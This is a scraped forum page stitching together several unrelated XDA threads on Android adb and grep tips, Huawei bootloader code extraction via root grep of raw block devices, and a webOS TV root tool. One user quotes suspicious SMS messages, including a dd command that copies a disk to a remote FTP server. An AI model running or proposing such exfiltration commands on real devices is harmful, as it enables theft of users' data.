Related
Hi guys,
hope this is the right forum.
I switched from iPhone4 now to the new Samsung Galaxy S II with 2.3.3 and brought my bluetooth Sennheiser MM450 which I would like to use in flight.
Anyway when I turn on the flight mode I can't turn on Bluetooth anymore!?
On my iPhone this was possible.
Is there any way to get Bluetooth in flight mode working as I dont wanna have my phone searching for networks during flight.
Any other App/hint etc. for this?
My Samsung is rooted by the way...
Like this?
Otherwise, on a more serious note: http://code.google.com/p/android/issues/detail?id=3289, see comment 42 there.
doktornotor said:
Otherwise, on a more serious note: ... see comment 42 there.
Click to expand...
Click to collapse
Thanks.... maybe I am too rookie for that... I installed QuickSSHd and logged in from my Putty but can't issue these commands:
# id
uid=0(root) gid=0(root) groups=0(root)
# adb remount /data
adb: not found
# sqlite3 /data/data/com.android.providers.settings/databases/settings.db
sqlite3: not found
So I searched but following issue:
# find / -iname adb
/sys/devices/virtual/usb_composite/adb
/sys/class/usb_composite/adb
# /sys/class/usb_composite/adb
/sys/class/usb_composite/adb: permission denied
adb is supposed to be used from your PC, need to install Android SDK there, not try to run it from phone shell.
Thanks, will try that out now and just installing JDK and Android SDK R11...
Ok. If you get permissions denied stuff, I would suggest loosely following this one:
http://dylanmtaylor.com/2010/10/19/closer-to-a-proper-froyo-limit-removal-fix/
For the remount /system thing, you need to check the actual device being mounted by running something like:
Code:
$ mount | grep /system
as it differs from device to device.
(Other way would involve getting ro.secure=0 which might be more complex than needed here. You can check what you have by getprop | grep ro.secure)
In this article, I will explain some of the confusions that may occur whilst using grep in logcat, dmesg, kmsg and last_kmsg on different platforms,mainly between Unix(Linux based such as ubuntu, linux mint, fedora, BSD based such as netbsd, freebsd, and even Mac) and Windows(Windows XP, Windows Vista, Windows 7, Windows 8 and etc).
Requirements:
Known about the existence of logcat, dmesg, kmsg, and last_kmsg and have tried logging it at least once
Know some basic knowledge of batch/bash(cmd/terminal)
Using Windows OS(The problem only lies on Windows, so if you're using Mac or Linux then you're fine)
Although this is a rather technical article, but I will make it as simple as possible for all of the users to understand
Sometimes, I will see some of the developers will issue similar to this:
Log Commands with Grep
Logcat:
adb logcat | grep 'htc'
Dmesg:
adb shell dmesg | grep 'mp_decision'
last_kmsg:
adb shell cat /proc/last_kmsg | grep 'mp_decision'
Click to expand...
Click to collapse
So, the problem is?
The problem is that if you're using a Windows OS, Windows OS doesn't have grep installed, so your command would not run and you will see an error message like this:
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
Linux or Mac users will not have this problem as they have grep installed, so they are fine.
Workaround:
1. Install a Linux shell on Windows
2. Use a terminal app within the Android phone
3. Connect to the linux shell inside the Android Phone by using your computer
4. Use the built-in filters(for logcat ONLY)
Workaround #1
You can simply click here and follow the simple steps to get a linux shell on your computer
Click to expand...
Click to collapse
Workaround #2
You just need to download a terminal app from your phone and every command will work fine. You would need to omit the adb and adb shell keyword(refer below) in order for the command to work. A nice terminal app suggestion would be https://play.google.com/store/apps/details?id=jackpal.androidterm&hl=en which you can simply download from Google Playstore
Click to expand...
Click to collapse
Workaround #3
You can just type "adb shell" and press enter, then type your commands(omit all adb and adb shell keyword) and it will work just as like in workaround #2.
Click to expand...
Click to collapse
Example
1. "adb shell" + enter
2. Choose the command that you wanted:
Logcat:
logcat | grep 'htc'
Dmesg:
dmesg | grep 'mp_decision'
last_kmsg:
cat /proc/last_kmsg | grep 'mp_decision'
Click to expand...
Click to collapse
Workaround #4
This workaround is a workaround which only exists for logcat, because logcat have a filtering system that is built into it(makes us wonder why it is not built into dmesg and last_kmsg as well eh?).
For example, the grep command for the logcat above can be replaced by:
adb logcat htc:V *:S
Click to expand...
Click to collapse
However, the downside is that you need to know the exact name of the app which is logged at the logcat in order to search for it while you can do a random keyword search with grep which helps a lot if you do not know what to look for.
For more information about the filtration, you can refer to http://developer.android.com/tools/debugging/debugging-log.html
Click to expand...
Click to collapse
Conclusion:
Hopefully, after reading this article, you will know how to deal with grep when you're on Windows OS
Do drop me a question or two if you have something that you don't understand and stay tuned for more articles! :highfive:
Actually most of these are already known but neverthless nice guide
Ps: Limited to 8 thanks per day so will thank later !
nikufellow said:
Actually most of these are already known but neverthless nice guide
Ps: Limited to 8 thanks per day so will thank later !
Click to expand...
Click to collapse
I do agree that the last 3 solutions are common but there's still people who doesn't know about it.
But I think that there'll be quite some people who doesn't know about the first workaround though, as it is not covered in most tutorials(unless you're looking at a rom building tutorial on windows), or do you?
Sure thing and thanks in advance
Found it when I needed the most, the 1st method.. Thanks, simple but a good article
Sent from my HTC_Amaze_4G using XDA Premium 4 mobile app
ravike14 said:
Found it when I needed the most, the 1st method.. Thanks, simple but a good article
Sent from my HTC_Amaze_4G using XDA Premium 4 mobile app
Click to expand...
Click to collapse
You're welcome Glad to be of help even though this thread is already at least one year old
wcypierre said:
You're welcome Glad to be of help even though this thread is already at least one year old
Click to expand...
Click to collapse
i found it useful after year hehe....hey for some weird reason the method 1 and 3 fails when it comes to '' dmesg | grep 'xxx' > dmesg.txt '' commad :/ the text comes empty even tho the grep related logs are there in the normal dmesg when i try method 1 using [Msysgit]..when i try the 3rd method it just say read only file system and stops if i choose the output as a .txt file..when i enter 'dmesg | grep 'xxx' without '.txt' it do nothing :/
ravike14 said:
i found it useful after year hehe....hey for some weird reason the method 1 and 3 fails when it comes to '' dmesg | grep 'xxx' > dmesg.txt '' commad :/ the text comes empty even tho the grep related logs are there in the normal dmesg when i try method 1 using [Msysgit]..when i try the 3rd method it just say read only file system and stops if i choose the output as a .txt file..when i enter 'dmesg | grep 'xxx' without '.txt' it do nothing :/
Click to expand...
Click to collapse
For the 1st method, there won't be any output as it is redirected to the file 'dmesg.txt'. Or you're indicating that the dmesg.txt file is empty?
For the 3rd one, are you running it on a rooted phone or stock bootloader?
Last but not least, can you give me an example of the command that you had tried for the 1st and 3rd method and a snippet of the dmesg.txt so that I can look into your problem?
wcypierre said:
For the 1st method, there won't be any output as it is redirected to the file 'dmesg.txt'. Or you're indicating that the dmesg.txt file is empty?
For the 3rd one, are you running it on a rooted phone or stock bootloader?
Last but not least, can you give me an example of the command that you had tried for the 1st and 3rd method and a snippet of the dmesg.txt so that I can look into your problem?
Click to expand...
Click to collapse
The dmesg.txt is empty, not even adb daemon text is there.. And yea I'm rooted and s-off.... I tried
For 1st method
adb shell dmesg | grep 'wl127xx' > dmesg.txt
For 3rd i tried
dmesg ¦ grep 'wl127xx'
And
dmesg ¦ grep 'wl127xx' > dmesg.txt
Tried the 3rd method even in Linux shell still a no go the txt is empty it just creates it and that's it.. When I execute the command without 'grep' I get the dmesg logs correctly.. But I really want the grep part lol..
Sent from my HTC_Amaze_4G using XDA Premium 4 mobile app
ravike14 said:
The dmesg.txt is empty, not even adb daemon text is there.. And yea I'm rooted and s-off.... I tried
For 1st method
adb shell dmesg | grep 'wl127xx' > dmesg.txt
For 3rd i tried
dmesg ¦ grep 'wl127xx'
And
dmesg ¦ grep 'wl127xx' > dmesg.txt
Tried the 3rd method even in Linux shell still a no go the txt is empty it just creates it and that's it.. When I execute the command without 'grep' I get the dmesg logs correctly.. But I really want the grep part lol..
Sent from my HTC_Amaze_4G using XDA Premium 4 mobile app
Click to expand...
Click to collapse
can you copy the text snippet of the dmesg that contains the 'wl127xx' text then? A screenshot or the actual text would do
wcypierre said:
can you copy the text snippet of the dmesg that contains the 'wl127xx' text then? A screenshot or the actual text would do
Click to expand...
Click to collapse
if you mean the normal dmesg text,
ravike14 said:
if you mean the normal dmesg text,
Click to expand...
Click to collapse
From what I've saw, there's only 'wl12xx' instead of 'wl127xx' though(note the missing '7'). Hence, the command should be dmesg | grep 'wl12xx'
wcypierre said:
From what I've saw, there's only 'wl12xx' instead of 'wl127xx' though(note the missing '7'). Hence, the command should be dmesg | grep 'wl12xx'
Click to expand...
Click to collapse
lol this is embarrassing haha i dont know how i missed that detail, thanks it worked i used '' dmesg | grep 'wl12xx' > /sdcard/dmesg.txt '' for method 3 and with adb shell i got it to pc straightly .. haha thanks again
ravike14 said:
lol this is embarrassing haha i dont know how i missed that detail, thanks it worked i used '' dmesg | grep 'wl12xx' > /sdcard/dmesg.txt '' for method 3 and with adb shell i got it to pc straightly .. haha thanks again
Click to expand...
Click to collapse
You're welcome After ruling out a few possibilities, I do feel that its either your grepping is wrong or the dmesg doesn't contains that text, which turns out to be true later on
I am getting a SMS that seems to be a hacking command.
Can anyone tell what this command does?
`/bin/sh ps aux | grep -i dd | grep -v ftp > pkill -f "dd" --halt -t 9 days -SIGTERM -exec [email protected] -S "bda"`~:/
On September 12, I had got an SMS from the same phone number (+1 561-935-9982) which seems to be a hacking command too:
dd if=/dev/ad0 of=ftp://silliconboy.secureftp.us bs=1M conv=noerror mode=silent
It looks like someone is trying to run a file copy command ("dd") to copy the files on my phone to a remote ftp server.
Is this really happening?
Can anyone execute UNIX commands on Android phones just by sending an SMS?
If an app is installed in your phone having root access, it can be done using shell commands. Make sure no unwanted app is installed or have root access. E.g. Cerberus app can do that.
Sent from my "1+2" powered by Unofficial RR
Compiled by myself.
boball said:
On September 12, I had got an SMS from the same phone number (+1 561-935-9982) which seems to be a hacking command too:
dd if=/dev/ad0 of=ftp://silliconboy.secureftp.us bs=1M conv=noerror mode=silent
It looks like someone is trying to run a file copy command ("dd") to copy the files on my phone to a remote ftp server.
Is this really happening?
Can anyone execute UNIX commands on Android phones just by sending an SMS?
Click to expand...
Click to collapse
it has to be an app, getting root access
So yesterday I got stuck in bootloop and I had to factory reset my phone in order to get it to work. Now the problem is that I need to root my phone again but Huawei doesn't support bootloader codes anymore :/ which is a shame. I made a backup from TWRP before I made a factory reset. Is there anyway I could get my bootloader code back? I also heard people using DC unlocker to get their bootloader codes? Does it really work? Do I have to downgrade my firmware or OTA to make DC unlocker work? I would be glad if anyone could help me answer any of my questions. Thanks.
Yes, i tried DC unloker.
you can get the code for 4 euros i think.
and in no time.
Most people don't know, but if you are still rooted, run this in a root terminal to get the code:
grep -m1 -aoE 'WVLOCK.{14}[0-9]{16}' /dev/block/mmcblk* | grep -aoE '[0-9]{16}'
Also, learn regex
oldosfan said:
Most people don't know, but if you are still rooted, run this in a root terminal to get the code:
grep -m1 -aoE 'WVLOCK.{14}[0-9]{16}' /dev/block/mmcblk* | grep -aoE '[0-9]{16}'
Also, learn regex
Click to expand...
Click to collapse
Awesome! Worked like a champ!!!
From computer:
0. Turn USB debugging On in phone and run following commands in computer command prompt.
1. adb devices
2. adb shell
3. su (allow access to ADB for Rooted prompt in phone)
4. grep -m1 -aoE 'WVLOCK.{14}[0-9]{16}' /dev/block/mmcblk* | grep -aoE '[0-9]{16}'
That it!
But attaching HonorTuner.apk in ZIP any ways for anyone to use.
rizkhan999 said:
Awesome! Worked like a champ!!!
From computer:
0. Turn USB debugging On in phone and run following commands in computer command prompt.
1. adb devices
2. adb shell
3. su (allow access to ADB for Rooted prompt in phone)
4. grep -m1 -aoE 'WVLOCK.{14}[0-9]{16}' /dev/block/mmcblk* | grep -aoE '[0-9]{16}'
That it!
But attaching HonorTuner.apk in ZIP any ways for anyone to use.
Click to expand...
Click to collapse
Big Thanks for this easy guide to rizkhan999.
Sucessfully unlocked my Huawei Mate S :good:
Zocker1012 said:
Big Thanks for this easy guide to rizkhan999.
Sucessfully unlocked my Huawei Mate S :good:
Click to expand...
Click to collapse
did it give u the code instantly?
I downgraded my honor 5x and rooted it with kingroot can I get my unlock code?
Ibrahim Tariq said:
did it give u the code instantly?
I downgraded my honor 5x and rooted it with kingroot can I get my unlock code?
Click to expand...
Click to collapse
Yeah,
grep -m1 -aoE 'WVLOCK.{14}[0-9]{16}' /dev/block/mmcblk* | grep -aoE '[0-9]{16}'
gave it me instantly.
Hello XDA,
After a long thinking i've decided to create a root or jailbreak tool for LG's awesome webOS, today am stating this thread to release this new root tool, but before that! am gonna ask you for some logs from webOS 3.5 and lower.
Everyone in this thread must know about webOS if not do your homework then get back again, LG did a great work on this operating system after HP and Palm's versions. they even supported Raspberry Pi module B. but webOS OSE aka Open Source Edition is really different from TV's version.
LG think about Security and frequently release updates that doesn't have anything new except some patches to close down known holes, one of my favorites was a directory traversal that can replace in tv files and binaries during install (partially closed recently).
let'stake a look at LG's partition filesystem types, on tv's they chooses to use ext4 for writable partitions (/var, some of /mnt/lg/*, /home and /media) everything else is using squashfs which is a read only compressed filesystem you cannot modify it.
If you can dump the squashfs partition unshquash it then recompress you will face another problem of hashes and crc checks (checkout the update binary for more details) if you dd it back to block device without kernel and/or bootloader patches. so this is not gonna just work easily.
What we can really do it play on the RW parts of the system, one of the design flaws on webOS is the devmode aka Developer Mode, they ship it in a Read Write partition so that's easy to be modified.
To do that you must have root access or some powerful exploits to achieve your goal.
This method is using memory access vulnerability to get root and then jailbreak the tv. i ported some parts of the other root thread even if some are not even needed.
To jailbreak connect to your tv via prisoner user after uploading GetMeIn binary into it then :
Code:
chmod +x GetMeIn
./GetMeIn
if root succeed and you saw some errors do this :
Code:
mkdir -p /media/cryptofs/root/etc
mkdir -p /media/cryptofs/root/lib
After that just reboot and enjoy your root with same ssh key, or use password "alpine".
there is some old pictures attached, i did some modifications after those.
Hope this is good enough.:angel:
HOW-TO
To use this GetMeIn webOS Jailbreak tool please create a developer account on LG's developer portal, install developer mode application on your TV and connect with your recently created account.
Open dev mode app please set the Dev Mode Status to ON and Key Server to ON.
grab your ssh key with ares then connect to your tv using ssh :
Code:
[email protected]:~# ssh -i ~/.ssh/webOS_TV [email protected] -p 9922
when you get connected you just follow the steps on the thread.
Please test and share back screen shouts and logs from tv in both cases failure or success.
I need informations from your webOS v 3.5 and lower, TV model and webOS version and some commands from the tv.
okay first of all create a dir named logs :
Code:
mkdir logs
TV Infos :
Code:
cat /var/run/nyx/device_info.json > logs/device_info.json
(delete your nduid serial number and mac addresses)
webOS Infos :
Code:
cat /var/run/nyx/os_info.json > logs/os_info.json
Code:
cat /proc/cpuinfo > logs/cpu.log
Code:
ls -arls /var/log/ > logs/logdir.log
Code:
ls -arls /usr/lib/ > logs/libsdir.log
Code:
ls -arls /proc/ > logs/procdir.log
Code:
ls -arls /dev/ > logs/devices.log
In case the jailbreak works restart and run this additional commands :
Code:
mount > logs/mounts.log
i think that's everything i need, upload the logs dir somewhere and put a link here.
Reserved again.
So this only works on webOS 3.5 and below?
MishaalRahman said:
So this only works on webOS 3.5 and below?
Click to expand...
Click to collapse
that's what i think yes, but you can test
MishaalRahman it's confirmed, also some lower versions are not supported like 3.3.3
BTW, can you check up your PM.
Hi,
unfortunately it does not work for me, I get the following output:
Code:
---------------------------------------------------------------
MerrukTechnolog < webOS privelage escalation (www.merruk.com)
---------------------------------------------------------------
GetMeIn: #* Opening memory IO!
GetMeIn: #! Cannot map memory data!
---------------------------------------------------------------
I already posted some logs of my LG OLED55B7D (05.80.15) in the other thread:
https://www.dropbox.com/s/ie5ix8vtscxjr3n/LG55B7D_05_80_15.zip?dl=0
Maybe some of this helps to improve your script.
blenni said:
Hi,
unfortunately it does not work for me, I get the following output:
Code:
---------------------------------------------------------------
MerrukTechnolog < webOS privelage escalation (www.merruk.com)
---------------------------------------------------------------
GetMeIn: #* Opening memory IO!
GetMeIn: #! Cannot map memory data!
---------------------------------------------------------------
I already posted some logs of my LG OLED55B7D (05.80.15) in the other thread:
https://www.dropbox.com/s/ie5ix8vtscxjr3n/LG55B7D_05_80_15.zip?dl=0
Maybe some of this helps to improve your script.
Click to expand...
Click to collapse
Your version is not supported by this tool, you have webos 3.8 unfortunately, and i really cannot help without access to tv with new api version, & i will need testers for newer devices.
@Maroc-OS
WebOS has the web socket endpoints to control the TV like
Code:
ssap://tv/getChannelList
After rooting the TV is possible to find out all the available endpoints on the TV? LG unfortunately has absolutely no documentation about it except the endpoints in the examples they provide.
If it is not too much work, could you please provide a list of all the available endpoints? I guess those needs to be defined somewhere in a config file...
Lg oled65g6v
Code:
/media/developer$ uname -a
Linux LGwebOSTV 3.16.7-77.deua.4 #1 SMP PREEMPT Thu Jun 21 17:26:37 KST 2018 armv7l GNU/Linux
/media/developer$ ./GetMeIn
---------------------------------------------------------------
MerrukTechnolog < webOS privelage escalation (www.merruk.com)
---------------------------------------------------------------
GetMeIn: #* Opening memory IO!
GetMeIn: #! Cannot map memory data!
---------------------------------------------------------------
/media/developer$ cat /var/run/nyx/os_info.json
{
"core_os_kernel_version": "3.16.7-77.deua.4",
"core_os_name": "Rockhopper",
"core_os_release": "3.3.3-3807",
"core_os_release_codename": "dreadlocks-dharug",
"encryption_key_type": "prodkey",
"webos_api_version": "4.1.0",
"webos_build_datetime": "20180621081934",
"webos_build_id": "3807",
"webos_imagename": "starfish-dvb-secured",
"webos_manufacturing_version": "05.30.25",
"webos_name": "webOS TV",
"webos_prerelease": "",
"webos_release": "3.3.3",
"webos_release_codename": "dreadlocks-dharug"
}
If I can be of any help to get this working on LG's 2016 OLED models gladly I would help...
Thank you for this awesomely fun opportunity to get into my panel! While I understand this is in its infancy, would you know a way of downgrading OS version? (Im on 4.x.x.x)
I hope sideload and extract creds in the best future. Thank you one again for the time and sharing of this. ?
What would be a good reason to root a smart tv? What can I do afterward?
now THIS is interesting! well done!
Same will we be able to download apps like Showbox or shadow tech(cloud gaming service)? After rooting we are all familiar with root on the phone side but rooting tv is definitely a first
lucaterpirla said:
What would be a good reason to root a smart tv? What can I do afterward?
Click to expand...
Click to collapse
thats what i'm asking myself too.
or was this the first step and now homebrew apps will rise?
please enlighten me someone. :laugh:
Sorry if this is a dumb question, but does this mean that Android TV could be ported over? That would be fantastic.
Fuking crazy
I'm about to root today after work.
Hope we get Android apps soon
This is awesome! and coming from someone from my home country. Genius!
Would it be possible to install Android TV after using this method?
Thank you very much!
I haven't tried the jailbreak yet, but here are the logs from two of my LG TVs:
LG EF9500: mediafire.com/file/8da335aynddi4se/LG_EF9500_Logs.zip
LG UF6400: mediafire.com/file/8045q0d0o6j8453/LG_UF6400_Logs.zip
XDA wont let me add hyperlinks so you'll have to copy and paste.
Wow seems there is some reactions to this topic.
first of all thank you for testing and reacting to this subject.
i will replay to every post one by one after this post.
thanks for you all.
wybielacz said:
@Maroc-OS
WebOS has the web socket endpoints to control the TV like
Code:
ssap://tv/getChannelList
After rooting the TV is possible to find out all the available endpoints on the TV? LG unfortunately has absolutely no documentation about it except the endpoints in the examples they provide.
If it is not too much work, could you please provide a list of all the available endpoints? I guess those needs to be defined somewhere in a config file...
Click to expand...
Click to collapse
Interesting. i did not knew about this, i will let you know once check this out.